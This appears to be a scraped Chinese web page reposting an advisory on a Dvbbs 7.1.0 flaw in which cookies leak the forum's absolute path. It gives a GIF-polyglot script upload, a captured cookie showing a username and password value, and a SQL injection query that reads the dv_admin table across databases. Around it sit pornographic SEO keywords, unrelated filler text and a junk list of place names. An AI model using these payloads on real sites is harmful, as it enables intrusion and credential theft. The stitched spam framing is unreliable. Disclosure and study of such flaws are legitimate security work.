人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

Dvbbs 7.1.0 cookie 存在泄露絕對路徑漏洞

Dvbbs 7.1.0 cookie 存在泄露絕對路徑漏洞

更新時間:2020-12-10 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
廠商名字:動網先鋒論談
廠商地址:http://www.dvbbs.net/
漏洞程序:Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站點的絕對路徑的漏洞,攻擊者可以配合其它技術,實現SQL跨庫查詢等。
漏洞利用例子:
一、泄露絕對漏洞測試:
對官方的測試站點:bbs.dvbbs.net
上傳一張圖,代碼如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB;
dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&
userclass=%D0%C2%CA%D6%C9%CF%C2%B7&
username=linzibct&password=t8ob621664s5v6HL&userhidden=2
&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站點的絕對路徑如下:
d:\\web\\dvbbs7為論談的絕對路徑
二、攻擊延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入點假設:
www.host.com\\linzi.asp?fuck=you
論談為dvbbs 7.1.0 ,數據庫為data\\\\dvbbs.asp,做了防下載處理.
利用上面的動網暴路徑,抓包得到絕對路徑為 d:\\www\\dvbbs\\data\\dvbbs.asp
實現跨庫查詢如下:
www.host.com\\linzi.asp?fuck=you and (select count(*)
from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")
官方補丁:
尚無


網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 垣曲县| 东莞市| 青川县| 柏乡县| 合江县| 阳春市| 中牟县| 晋中市| 饶阳县| 平原县| 如东县| 阳春市| 余干县| 东丰县| 隆回县| 宝坻区| 六盘水市| 新泰市| 余庆县| 依安县| 阳信县| 海南省| 昌都县| 峨眉山市| 潜山县| 南城县| 盐源县| 南澳县| 六盘水市| 乃东县| 吉首市| 营口市| 乡宁县| 金山区| 辰溪县| 大同市| 新营市| 策勒县| 蓝田县| 襄垣县| 随州市|